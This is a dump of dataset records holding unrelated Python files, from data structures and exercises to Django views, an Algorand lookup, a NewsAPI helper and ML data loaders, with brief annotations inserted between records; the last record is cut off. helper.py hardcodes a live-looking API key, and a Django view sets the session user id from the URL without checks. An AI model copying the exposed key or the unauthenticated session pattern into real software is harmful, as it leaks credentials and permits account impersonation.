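The grid formation above centers a rows-by-columns block around (x, y); the one-dimensional origin arithmetic, checked numerically:

columns, padding_x, x = 4, 10.0, 0.0
origin_x = -columns * padding_x / 2 + x + padding_x / 2
xs = [origin_x + i * padding_x for i in range(columns)]
print(xs, sum(xs) / columns)   # [-15.0, -5.0, 5.0, 15.0] centered on x = 0.0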
the __eq__ method.\n :return: True iff obj or its equivalent has been added to this set\n and not removed\n \"\"\"\n #return False\n index = hash (obj) % len(self.table)\n #index = hash_function( key, len( self.table ) )\n entry = self.table[ index ]\n while entry is not None:\n if entry.obj == obj:\n return True\n entry = entry.chain\n return False\n '''\n def remove(self, obj):\n \"\"\"\n Remove an object from the set.\n :param obj: the value to remove\n :return: None\n :post: not self.contains( obj )\n \"\"\"\n load_factor = self.size / self.INITIAL_NUM_BUCKETS\n if load_factor <= 1-self.LOAD_LIMIT\n if load_factor >= self.LOAD_LIMIT:\n self._rehashShrink()\n #print('**Size is :**',self.size)\n index = hash (obj) % len(self.table)\n current = self.table[index]\n prev = self.table[index]\n if self.contains(obj):\n if current.obj == obj and self.front.obj == obj:\n self.table[index] = current.chain\n current.link.prev = None\n self.front = self.front.link\n self.size -= 1\n elif current.obj == obj and self.back.obj == obj:\n self.table[index] = current.chain\n self.back = self.back.prev\n current.prev.link = current.link\n self.size -= 1\n else:\n while current.prev is not None :\n if current.obj == obj:\n prev.chain = current.chain\n current.prev.link = current.link\n current.link.prev = current.prev\n self.size -= 1\n #current.chain = current.chain.chain\n else:\n prev = current\n current = current.chain\n else:\n print('Element Not Found')\n '''\n\n def remove(self, obj):\n \"\"\"\n Remove an object from the set.\n :param obj: the value to remove\n :return: None\n :post: not self.contains( obj )\n \"\"\"\n load_factor = self.size / self.INITIAL_NUM_BUCKETS\n if load_factor <= 1-self.LOAD_LIMIT:\n self._rehashShrink()\n\n index = hash (obj) % len(self.table)\n current = self.table[index]\n prev = self.table[index]\n if self.contains(obj):\n if current.obj == obj and self.front.obj == obj and self.size > 1:\n self.table[index] = current.chain\n current.link.prev = None\n self.front = self.front.link\n self.size -= 1\n elif current.obj == obj and self.front.obj == obj and self.size <= 1:\n self.table[index] = current.chain\n current = None\n self.front = None\n self.size -= 1\n elif current.obj == obj and self.back.obj == obj:\n self.table[index] = current.chain\n self.back = self.back.prev\n current.prev.link = current.link\n self.size -= 1\n else:\n while current.prev is not None :\n if current.obj == obj:\n prev.chain = current.chain\n current.prev.link = current.link\n current.link.prev = current.prev\n self.size -= 1\n break\n #current.chain = current.chain.chain\n else:\n prev = current\n current = current.chain\n else:\n print('Element Not Found')\n\n def _rehashExpand( self ):\n \"\"\"\n Rebuild the map in a larger table. The current map is not changed\n in any way that can be seen by its clients, but internally its table is\n grown.\n :return: None\n \"\"\"\n new_cap = self.MIN_BUCKETS if 2 * self.INITIAL_NUM_BUCKETS < self.MIN_BUCKETS else 2*self.INITIAL_NUM_BUCKETS\n print( \"Rehashing from\",self.INITIAL_NUM_BUCKETS, \"to\", new_cap )\n self.INITIAL_NUM_BUCKETS = new_cap\n node = self.front\n self.front = None\n self.back = None\n self.size = 0\n self.table = new_cap * [None]\n while node is not None:\n self.add(node.obj)\n node = node.link\n\n def _rehashShrink( self ):\n \"\"\"\n Rebuild the map in a larger table. 
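linkedhashtable.py keeps insertion order with an explicit doubly linked chain; since CPython 3.7 a plain dict already gives the ordered-set behaviour its main() exercises. For comparison:

ordered = dict.fromkeys(['batman', 'has', 'lots', 'of', 'gizmos'])
ordered.pop('has', None)        # removal keeps the remaining order intact
print(' '.join(ordered))        # batman lots of gizmos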
The current map is not changed\n in any way that can be seen by its clients, but internally its table is\n grown.\n :return: None\n \"\"\"\n new_cap = self.MIN_BUCKETS if self.INITIAL_NUM_BUCKETS // 2 < self.MIN_BUCKETS else self.INITIAL_NUM_BUCKETS // 2\n print( \"Rehashing from\",self.INITIAL_NUM_BUCKETS, \"to\", new_cap )\n self.INITIAL_NUM_BUCKETS = new_cap\n node = self.front\n self.front = None\n self.back = None\n self.size = 0\n self.table = new_cap * [None]\n while node is not None:\n self.add(node.obj)\n node = node.link\n\n\ndef print_set( a_set ):\n for word in a_set: # uses the iter method\n print( word, end=\" \" )\n print()\n\ndef main():\n table = LinkedHashTable (100)\n table.add('batman')\n table.add('has')\n table.add('lots')\n table.add('of')\n table.add('gizmos')\n table.add('in')\n table.add('his')\n table.add('belt')\n print_set(table)\n table.remove('has')\n print_set(table)\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"Assignment10/linkedhashtable.py","file_name":"linkedhashtable.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161528566","text":"#coding:utf-8\n\n\"\"\"\nExercice 20 : \n\n\tEcrire un algorithme qui demande successivement 10 nombres à l'utilisateur, \n\tet qui affiche à la fin le plus grand de ces 10 nombres Et affiche aussi \n son rang dans la liste saisie\n\"\"\"\n\nprint(\"---------------------------- Le plus Grand et Rang --------------------------------------\")\n\nprint(\" Saisir 10 nombre entier :: \")\n\nmax = 0\nrang = 0\n\ntaille = 10\ni = 1\nwhile(i <= taille) :\n print(\"Nombre \", i , \" ::\")\n val = int(input(\"> \"))\n if(i == 1) :\n max = val\n rang = i\n else:\n if max < val:\n max = val\n rang = i\n i += 1\n\nprint(\"Le nombre le plus grand est :: \", max,\" \\nSont rang est :: \", rang)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"algo_td1_python/Exercice_20.py","file_name":"Exercice_20.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648393482","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport unittest\nfrom animal_factory import *\n\nclass AnimalTestCase(unittest.TestCase):\n def test_dog(self):\n dog = AnimalFactory()\n call = dog.make_sound('Dog')\n self.assertEqual(call, 'Bhow Bhow!!')\n \n def test_cat(self):\n cat = AnimalFactory()\n call = cat.make_sound('Cat')\n self.assertEqual(call, \"Meow Meow!!\")\n \nif __name__ == \"__main__\":\n unittest.main()","sub_path":"unittest_&_factorymode/factory_mode/testcase_animal_factory.py","file_name":"testcase_animal_factory.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"348670893","text":"def isPerfect(num):\n acum = 0 # Zerando o acumulador\n for i in range(1, num): # Laço de repetição que vai de 1 até num\n if(num % i == 0): # Verificando se num é divisível por i\n acum = acum + i # Se for divisível, somamos no acumulador\n \n if(acum == num): # Verificando se a soma é igual ao próprio número\n return True # Se for perfeito, retornar verdadeiro\n else:\n return False # Se não for perfeito, retornar falso\n\nprint(isPerfect(28))\nprint(isPerfect(6))\nprint(isPerfect(496))\nprint(isPerfect(5))\nprint(isPerfect(10))\n","sub_path":"Algoritmos Na Prática/Exemplos e 
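Exercice_20.py above (prompt and comments in French: read ten integers, then report the largest and its rank) tracks the maximum and its position by hand; max over enumerate does it in one pass and keeps the first occurrence on ties, matching the original's strict comparison:

values = [3, 9, 4, 9, 1]
rang, maximum = max(enumerate(values, start=1), key=lambda pair: pair[1])
print(maximum, rang)   # 9 2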
Desafios/isPerfect.py","file_name":"isPerfect.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518680812","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.http import HttpRequest\nfrom .models import DirPersonnel\nfrom . import connector\nimport json\nfrom . import wechatuser\n\ndef index(request):\n\t# context = {\n\t# \t'teams_list': Teams.objects.all(), \n\t# \t'tasks_list': Tasks.objects.all()\n\t# }\n\tcontext = {\n\t\t'teams_list': [connector.getHotGroups(4)],\n\t\t'tasks_list': [connector.getRecentTasks(5)],\n\t}\n\n\treturn render(request, 'appuser/index.html', context)\n\ndef wechat(request):\n \"\"\"Renders the wechat page.\"\"\"\n assert isinstance(request, HttpRequest)\n nsukey = request.GET.get('nsukey', 'none')\n if ( nsukey == 'none'):\n datadict = wechatuser.getUser(request)\n urlopenid = datadict['openid']\n try:\n person = DirPersonnel.objects.get(openID=urlopenid)\n person_id = person.person_id\n request.session['person_id'] = person_id\n request.session.set_expiry(0)\n request.session.save()\n except DirPersonnel.DoesNotExist:\n pass\n return index(request)\n\ndef allteams(request):\n\tcontext = { 'teamsjson':[connector.getAllTeams()] }\n\treturn render(request, 'appuser/allteams.html',context)\n \ndef alltasks(request):\n\tcontext = { 'tasksjson':[connector.getAllTasks()] }\n\treturn render(request, 'appuser/task-list.html',context)\n\ndef teams(request,teamid):\n\tcontext = {'teamjson':[connector.getTeambyID(teamid)]}\n\treturn render(request, 'appuser/team.html',context)\n\ndef taskdetail(request, taskid):\n context = {'taskdetail':connector.getTaskbyID(taskid)}\n return render(request, 'appuser/task-detail.html',context)\n\n \ndef setpersonid(request, personid):\n request.session['person_id'] = personid\n request.session.set_expiry(0)\n request.session.save()\n context = { 'personid':request.session['person_id'] }\n return render(request, 'appuser/setpersonid.html',context)\n\ndef getpersonid(request):\n if 'person_id' in request.session:\n context = { 'personid':request.session['person_id'] }\n else:\n context = { 'personid':'No user set' }\n return render(request, 'appuser/getpersonid.html',context)\n ","sub_path":"sitedir/appuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74013222","text":"import sys\r\n\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport numpy as np\r\nfrom cv2 import GaussianBlur, normalize, NORM_MINMAX, threshold, THRESH_BINARY\r\nfrom spellchecker import SpellChecker\r\nfrom autocorrect import Speller\r\n\r\npytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\n\r\ndef readerMain(filename):\r\n\r\n spell = SpellChecker()\r\n spell2 = Speller(lang = \"en\")\r\n\r\n img = np.array(Image.open(filename))\r\n norm_img = np.zeros((img.shape[0], img.shape[1]))\r\n\r\n img = normalize(img, norm_img, 0, 255, NORM_MINMAX)\r\n img = threshold(img, 100, 255, THRESH_BINARY)[1]\r\n img = GaussianBlur(img, (1, 1), 0)\r\n\r\n def convert(lst):\r\n return ([i for item in lst for i in item.split()])\r\n\r\n text = [str(pytesseract.image_to_string(img))]\r\n ctext = convert(text)\r\n scheckedtext = []\r\n\r\n with open(\"Words.txt\", \"w+\") as file:\r\n for i in ctext:\r\n i = spell2(spell.correction(i))\r\n 
scheckedtext.append(i)\r\n file.write(i + \"\\n\")\r\n\r\n for i in range(7):\r\n scheckedtext.insert(0, \" \")\r\n\r\n return scheckedtext\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191493208","text":"import ael\ntry:\n infile = open('C:\\\\Documents and Settings\\\\abhj106\\\\My Documents\\\\EersteFloerwerk\\\\changedeals.csv')\nexcept:\n print('Error opening file')\nnewCp = ael.Party['DMX INTERNAL FX']\nprint('New: ', newCp.ptyid)\nline = infile.readline()\nwhile line:\n trdn = line.rstrip()\n trd = ael.Trade[(int)(trdn)]\n #print trd.counterparty_ptynbr.ptyid\n trdclone = trd.clone()\n trdclone.counterparty_ptynbr = newCp\n print('old: ', trd.counterparty_ptynbr.ptyid)\n print('New: ', trdclone.counterparty_ptynbr.ptyid)\n trdclone.commit()\n line = infile.readline()\ninfile.close()\n","sub_path":"Python modules/SAIRD_MoveCP_From_File.py","file_name":"SAIRD_MoveCP_From_File.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341264932","text":"def dbl_linear(n):\n set_ = list()\n x = 1\n index = 0\n set_.append(x)\n while len(set_) <= n:\n tmp_set_ = set_\n for x in set_:\n tmp_set_.append(2*x+1)\n tmp_set_.append(3*x+1)\n set_ = tmp_set_\n set_.sort()\n return set_\n\n\ndef dbl_linear(n):\n arr = [1]\n y_incr, z_incr = 0, 0\n for i in range(n):\n y = arr[y_incr]*2+1\n z = arr[z_incr]*3+1\n if y <= z:\n arr.append(y)\n y_incr += 1\n if y == z:\n z_incr += 1\n else:\n arr.append(z)\n z_incr += 1\n return arr[n]\n\n'''\n\nin cpp\n\n#include \n#include \n#include \n\nstatic int dblLinear(int n){\n std::vector arr = {n};\n int y_incr = 0;\n int z_incr = 0;\n for (int i = 0; i < n; i++){\n int y = arr[y_incr]*2+1;\n int z = arr[z_incr]*3+1;\n if (y <= z){\n arr.push_back(y);\n y_incr += 1;\n if (y == z){\n z_incr += 1;\n }\n } else {\n arr.push_back(z);\n z_incr += 1;\n }\n }\n return arr[n];\n}\n\nint main(){\n std::cout << dblLinear(10);\n return 0;\n}\n\n'''","sub_path":"Algorithms/Double Linear 2 solns.py","file_name":"Double Linear 2 solns.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384348540","text":"from connection import algo_client\r\nimport logging\r\n\r\n\r\n# Get account information of an address\r\ndef enquireAddress(accountAddress):\r\n try:\r\n assert(len(accountAddress) == 58)\r\n account_info = algo_client.account_info(accountAddress)\r\n print(account_info)\r\n logging.info(\"..@dev Enquire account.. \\nAccount information: {}\\n\".format(account_info))\r\n except Exception as err:\r\n msg = \"Address is invalid. \\n Length must be 58\\n\"\r\n logging.info(\"..@dev Enquire account Error.. 
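The double-linear record above already includes a linear two-pointer version; a heap plus a seen-set is another standard way to enumerate the sequence, at O(n log n). A sketch:

import heapq

def dbl_linear_heap(n):
    heap, seen = [1], {1}
    for _ in range(n):
        x = heapq.heappop(heap)
        for nxt in (2 * x + 1, 3 * x + 1):
            if nxt not in seen:
                seen.add(nxt)
                heapq.heappush(heap, nxt)
    return heap[0]

print(dbl_linear_heap(10))   # 22, matching dbl_linear(10)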
\\nError getting account information: {}Message: {}\\n\".format(msg, err))\r\n","sub_path":"accountInquiry.py","file_name":"accountInquiry.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104062273","text":"import requests\r\nimport json\r\n\r\nAPI_KEY = \"27bd1bb9af0b4379852de8226697827d\"\r\n\r\n\r\ndef return_list(url):\r\n data = requests.get(url)\r\n diction_load = json.loads(data.content)\r\n\r\n List = []\r\n if diction_load['status'] == \"error\":\r\n print(\"error\")\r\n articles = diction_load['articles']\r\n for item in articles:\r\n dictionary = {}\r\n dictionary['author'] = item['author']\r\n dictionary['title'] = item['title']\r\n dictionary['url'] = item['url']\r\n dictionary['imageSrc'] = item['urlToImage']\r\n dictionary['time'] = item['publishedAt']\r\n List.append(dictionary)\r\n return List\r\n\r\n\r\ndef top_headlines_search(search):\r\n search_top_headlines = \"https://newsapi.org/v2/top-headlines?q=\" + search + \"&apiKey=\" + API_KEY\r\n List = return_list(search_top_headlines)\r\n print(List)\r\n return List\r\n\r\n\r\ndef get_top_headlines_category(category):\r\n country = \"in\"\r\n top_headlines_category = \"https://newsapi.org/v2/top-headlines?country=\" + country + \"&category=\" + category + \"&apiKey=\" + API_KEY\r\n List = return_list(top_headlines_category)\r\n print(List)\r\n\r\n\r\ndef get_news_from_source(source):\r\n top_headlines_src = \"https://newsapi.org/v2/top-headlines?sources=\" + source + \"&apiKey=\" + API_KEY\r\n List = return_list(top_headlines_src)\r\n print(List)\r\n\r\n\r\ndef get_top_headlines_country(country):\r\n country = country\r\n top_headlines_country = \"https://newsapi.org/v2/top-headlines?country=\" + country + \"&apiKey=\" + API_KEY\r\n List = return_list(top_headlines_country)\r\n print(List)\r\n","sub_path":"scl-mini-sankalp/flaskProject/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"383348792","text":"#\n# @lc app=leetcode.cn id=416 lang=python3\n#\n# [416] 分割等和子集\n#\n\n\n# @lc code=start\nclass Solution:\n def canPartition(self, nums: List[int]) -> bool:\n total = sum(nums)\n if total % 2 != 0:\n return False\n\n sz = len(nums)\n wt = total // 2 + 1\n dp = [False for _ in range(wt)]\n dp[0] = True\n for i in range(sz):\n for j in range(wt - 1, -1, -1):\n if (j - nums[i] >= 0):\n dp[j] = dp[j] | dp[j - nums[i]]\n\n return dp[wt - 1]\n\n\n# @lc code=end\n","sub_path":"records/416.分割等和子集.py","file_name":"416.分割等和子集.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198363680","text":"from typing import Iterable, Set, List, Dict\n\nfrom exporter.graph.entity.input import Input\nfrom exporter.graph.entity.output import Output\nfrom .protocol import ProtocolLink\n\n\nclass ProcessLink:\n def __init__(self, process_uuid: str, process_type: str,\n inputs: Iterable[Input], outputs: Iterable[Output], protocols: Iterable[\n ProtocolLink]):\n self._input_uuids: Set[str] = set()\n self._outputs_uuids: Set[str] = set()\n self._protocol_uuids: Set[str] = set()\n\n self.process_uuid = process_uuid\n self.process_type = process_type\n self.inputs: List[Input] = list()\n self.outputs: List[Output] = list()\n self.protocols: List[ProtocolLink] = list()\n\n for i in inputs:\n self.add_input(i)\n\n for o in outputs:\n 
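The LeetCode 416 record above rolls the classic boolean subset-sum row; in Python the whole row also packs into one integer, shifted left once per item. A sketch:

def can_partition(nums):
    total = sum(nums)
    if total % 2:
        return False
    bits = 1                    # bit k set <=> some subset sums to k
    for v in nums:
        bits |= bits << v
    return bool((bits >> (total // 2)) & 1)

print(can_partition([1, 5, 11, 5]), can_partition([1, 2, 3, 5]))   # True False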
self.add_output(o)\n\n for p in protocols:\n self.add_protocol(p)\n\n def add_input(self, i: Input):\n if i.input_uuid not in self._input_uuids:\n self._input_uuids.add(i.input_uuid)\n self.inputs.append(i)\n\n def add_output(self, o: Output):\n if o.output_uuid not in self._outputs_uuids:\n self._outputs_uuids.add(o.output_uuid)\n self.outputs.append(o)\n\n def add_protocol(self, p: ProtocolLink):\n if p.protocol_uuid not in self._protocol_uuids:\n self._protocol_uuids.add(p.protocol_uuid)\n self.protocols.append(p)\n\n def to_dict(self) -> Dict:\n return dict(\n link_type=\"process_link\",\n process_id=self.process_uuid,\n process_type=self.process_type,\n inputs=[i.to_dict() for i in self.inputs],\n outputs=[o.to_dict() for o in self.outputs],\n protocols=[p.to_dict() for p in self.protocols]\n )\n","sub_path":"exporter/graph/link/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479004977","text":"\"\"\"\nModule:\nload training data and split into training, validating and testing\ninclude: hurricane, atmospheric river and fronts\n\"\"\"\n\nimport os\nimport numpy\nimport h5py\nimport logging\nimport sklearn\nfrom sklearn import preprocessing\nimport ipdb\n\nlogger=logging.getLogger(\"data_loader\")\nlogger.setLevel(\"INFO\")\n\n#define function to load the data \n\ndef happy_loader(rng_seed,path,fname,groups,train_num_p,valid_num_p,test_num_p,train_num_n,valid_num_n,test_num_n,n_type,normalize):\n \"\"\"\n load hurricane, atmospheric river, fronts data and split into train, valid and test set\n \"\"\"\n numpy.random.seed(rng_seed)\n #NOTE, NEON seems has problmes of the RNG_SEED in the backend, I am explicitly specify the seeds here\n\n ff=os.path.join(path,fname)\n\n logger.info(\"training data...%s\" %ff)\n data=h5py.File(ff,\"r\")\n hurricane_positive=data[groups[0]]\n hurricane_negative=data[groups[1]]\n\n #generally follow the 80%-20% rule, X is data, Y is label\n X_train=numpy.vstack((hurricane_positive[:train_num_p],hurricane_negative[:train_num_n]))\n Y_train=numpy.hstack((numpy.ones(train_num_p),numpy.zeros(train_num_n)))\n \n X_valid=numpy.vstack((hurricane_positive[train_num_p:train_num_p+valid_num_p],\n hurricane_negative[train_num_n:train_num_n+valid_num_n]))\n Y_valid=numpy.hstack((numpy.ones(valid_num_p),numpy.zeros(valid_num_n)))\n\n X_test=numpy.vstack((hurricane_positive[train_num_p+valid_num_p:train_num_p+valid_num_p+test_num_p],\n hurricane_negative[train_num_n+valid_num_n:train_num_n+valid_num_n+test_num_n]))\n Y_test=numpy.hstack((numpy.ones(test_num_p),numpy.zeros(test_num_n)))\n \n #normalize data if normalize is needed\n if normalize:\n if abs(n_type -1)==0: #global contrast\n X_train=global_contrast_norm(X_train)\n X_valid=global_contrast_norm(X_valid)\n X_test=global_contrast_norm(X_test)\n elif abs(n_type -2)==0: #standard norm \n X_train=stand_norm(X_train)\n X_valid=stand_norm(X_valid)\n X_test=stand_norm(X_test)\n elif abs(n_type -3)==0: #sklearn style l1/l2 norm\n X_train=norm_norm(X_train)\n X_valid=norm_norm(X_valid)\n X_test=norm_norm(X_test)\n \n # randomly shuffle data, mixing positive and negative example\n X_train,Y_train=rand_data(X_train,Y_train)\n X_valid,Y_valid=rand_data(X_valid,Y_valid)\n X_test,Y_test=rand_data(X_test,Y_test)\n\n #flat all input images into feature vector (The ner version of NEON requires data be presented this way)\n X_train=fllat(X_train)\n X_valid=fllat(X_valid)\n X_test=fllat(X_test)\n\n 
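happy_loader above slices each class by hand-counted offsets; numpy.split expresses the same three-way cut from the boundary indices alone. A toy sketch:

import numpy as np

data = np.arange(10)
train, valid, test = np.split(data, [6, 8])   # boundaries at 60% and 80%
print(train, valid, test)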
return (X_train, Y_train), (X_valid, Y_valid), (X_test, Y_test)\n\ndef fllat(A):\n \"\"\"\n flat input images into a one dimensional feature vector\n pay attention to the nD array structure\n A: image data\n \"\"\"\n shp=A.shape\n B=A.reshape(shp[0],-1) #flat all except the first dimension\n return B\n\ndef rand_data(A,B):\n \"\"\"\n randomly mixing/shuffing the positive and negative example\n A: image data\n B: corresponding label\n \"\"\"\n logger.info(\"randomly shuffle data...\")\n ss=range(len(A))\n numpy.random.shuffle(ss)\n A=A[ss]\n B=B[ss] \n\n return A, B\n\n\n\"\"\"\nI previously found that classification model performance and modle overfitting \nis sensitive to the data normalizaion. Here try several normalization technique\n1) simple feature scaling (scale to [0,1] or [-1,1])\n2) gobal contrast normalization\n3) l1 or l2 norm normalization\n\"\"\"\n\ndef global_contrast_norm(A, scale=1.0,min_divisor=1e-8):\n \"\"\"\n ###this function is the same as in NEON source code\n Subtract mean and normalize by vector norm [normalize accross channel]\n A: image data\n \"\"\"\n \n logger.info(\"do global contrast normalization...\")\n A = A - A.mean(axis=1)[:, numpy.newaxis]\n\n normalizers = numpy.sqrt((A ** 2).sum(axis=1)) / scale\n normalizers[normalizers < min_divisor] = 1.\n\n A /= normalizers[:, numpy.newaxis]\n\n return A\n\ndef stand_norm(A):\n \"\"\"\n subtract mean and divide by standard deviation of each channel\n A: image data\n \"\"\"\n logger.info(\"do standard normalization...\")\n\n sh=A.shape\n A =A.reshape(sh[0],sh[1],-1) #flat feature of each channel\n A =A -A.mean(axis=2)[:,:,numpy.newaxis] #numpy.newaxis makes a new matrix dimension\n stdd=A.std(axis=2)[:,:,numpy.newaxis]\n stdd[stdd<1e-8]=1.\n A /=stdd\n #A /= A.std(axis=2)[:,:,numpy.newaxis]\n\n A=A.reshape(sh)\n \n return A\n\ndef norm_norm(A):\n \"\"\"\n l1 norm of input data (scikit learn)\n A: image data\n \"\"\"\n logger.info(\"do l1/l2 norm normalization...\")\n sh=A.shape\n A=A.reshape(sh[0],sh[1],-1)\n for i in range(sh[0]):\n A[i]=preprocessing.normalize(A[i], axis=1,norm=\"l2\")\n \n A=A.reshape(sh)\n return A\n \n","sub_path":"elephant/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422938337","text":"def count_words(input_str):\n ''' Returns a dictionary with counts of each word in a string '''\n words = input_str.split(' ')\n slimwords = []\n worddict = {}\n for word in words:\n if word not in slimwords:\n slimwords.append(word)\n for word in slimwords:\n worddict[word] = words.count(word)\n return worddict\n","sub_path":"count_words/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583662383","text":"# Copyright (c) 2020-2023 Antmicro \n#\n# SPDX-License-Identifier: Apache-2.0\n\nimport pytest\nfrom typing import Type, Tuple\nfrom pathlib import Path\n\nfrom kenning.core.runtime import Runtime\nfrom kenning.core.dataset import Dataset\nfrom kenning.core.model import ModelWrapper\nfrom kenning.runtimes.renode import RenodeRuntime\nfrom kenning.runtimeprotocols.uart import UARTProtocol\nfrom kenning.utils.class_loader import get_all_subclasses\nfrom kenning.tests.core.conftest import get_default_dataset_model\nfrom kenning.tests.core.conftest import UnknownFramework\n\n\nRUNTIME_SUBCLASSES = get_all_subclasses(\n 'kenning.runtimes',\n 
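rand_data in data_load.py shuffles range(len(A)) in place, which only works on Python 2, where range returns a list; numpy.random.permutation behaves the same on both Python 2 and 3. A sketch:

import numpy as np

A = np.arange(12).reshape(6, 2)
B = np.arange(6)
idx = np.random.permutation(len(A))   # a shuffled index array, any Python version
A, B = A[idx], B[idx]
print(B)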
Runtime,\n raise_exception=True\n)\n\nRUNTIME_INPUTTYPES = [\n (run, inp) for run in RUNTIME_SUBCLASSES for inp in run.inputtypes\n]\n\n\ndef prepare_objects(\n runtime_cls: Type[Runtime],\n inputtype: str) -> Tuple[Runtime, Dataset, ModelWrapper]:\n try:\n dataset, model = get_default_dataset_model(inputtype)\n except UnknownFramework:\n pytest.xfail(f'Unknown framework: {inputtype}')\n\n if runtime_cls is RenodeRuntime:\n resources_path = Path('build/renode-resources/springbok')\n runtime = runtime_cls(\n protocol=UARTProtocol('/tmp/uart', 115200),\n runtime_binary_path=resources_path / 'iree_runtime',\n platform_resc_path=resources_path / 'springbok.resc',\n disable_profiler=True\n )\n else:\n runtime = runtime_cls(protocol=None, model_path=model.model_path)\n\n return runtime, dataset, model\n\n\nclass TestRuntime:\n\n @pytest.mark.parametrize('runtime_cls,inputtype', [\n pytest.param(runtime_cls, inputtype, marks=[\n pytest.mark.dependency(\n name=f'test_initializer[{runtime_cls.__name__}]'\n ),\n pytest.mark.xdist_group(name=f'TestRuntime_{runtime_cls.__name__}')\n ])\n for runtime_cls, inputtype in RUNTIME_INPUTTYPES\n ])\n def test_initializer(self, runtime_cls: Type[Runtime], inputtype: str):\n \"\"\"\n Tests runtime initialization.\n \"\"\"\n _ = prepare_objects(runtime_cls, inputtype)\n\n @pytest.mark.parametrize('runtime_cls,inputtype', [\n pytest.param(runtime_cls, inputtype, marks=[\n pytest.mark.dependency(\n name=f'test_prepare_local[{runtime_cls.__name__}]',\n depends=[f'test_initializer[{runtime_cls.__name__}]']\n ),\n pytest.mark.xdist_group(name=f'TestRuntime_{runtime_cls.__name__}')\n ])\n for runtime_cls, inputtype in RUNTIME_INPUTTYPES\n ])\n def test_prepare_local(self, runtime_cls: Type[Runtime], inputtype: str):\n \"\"\"\n Tests the `preprocess_input` method.\n \"\"\"\n runtime, _, _ = prepare_objects(runtime_cls, inputtype)\n\n try:\n assert runtime.prepare_local()\n except NotImplementedError:\n pytest.xfail(f'{runtime_cls.__name__} does not support local run')\n\n @pytest.mark.parametrize('runtime_cls,inputtype', [\n pytest.param(runtime_cls, inputtype, marks=[\n pytest.mark.dependency(\n depends=[f'test_prepare_local[{runtime_cls.__name__}]']\n ),\n pytest.mark.xdist_group(name=f'TestRuntime_{runtime_cls.__name__}')\n ])\n for runtime_cls, inputtype in RUNTIME_INPUTTYPES\n ])\n def test_inference(self, runtime_cls: Type[Runtime], inputtype: str):\n \"\"\"\n Tests the `run_locally` method.\n \"\"\"\n runtime, dataset, model = prepare_objects(runtime_cls, inputtype)\n\n runtime.run_locally(dataset, model, str(model.model_path))\n","sub_path":"kenning/tests/core/test_runtime.py","file_name":"test_runtime.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48619722","text":"# -*- coding: utf-8 -*-\ndef convert_number(s):\n\ttry:\n\t\treturn int(s)\n\texcept ValueError:\n\t\treturn None\n\ndef scan(sentence):\n\tdirections = \"north, south, east, west, down, up, left, right, back\".split(', ')\n\tverbs = \"go, stop, kill, eat\".split(\", \")\n\tstops = \"the, in, of, from, at, it\".split(\", \")\n\tnouns = \"door, bear, princess, cabinet\".split(\", \")\n\twords = sentence.split(' ')\n\tresults = []\n\tfor word in words:\n\t\tif word in directions:\n\t\t\tresults.append(('direction', word))\n\t\telif word in verbs:\n\t\t\tresults.append(('verb', word))\n\t\telif word in stops:\n\t\t\tresults.append(('stop', word))\n\t\telif word in nouns:\n\t\t\tresults.append(('noun', 
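test_runtime.py above parametrizes its tests over a (runtime class, input type) cross product; the same pattern in miniature (pytest assumed installed; int/float and the format strings are stand-ins):

import pytest

CASES = [(kind, fmt) for kind in (int, float) for fmt in ("onnx", "tflite")]

@pytest.mark.parametrize("kind,fmt", CASES)
def test_cross_product(kind, fmt):
    assert isinstance(kind(), kind) and fmt in ("onnx", "tflite")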
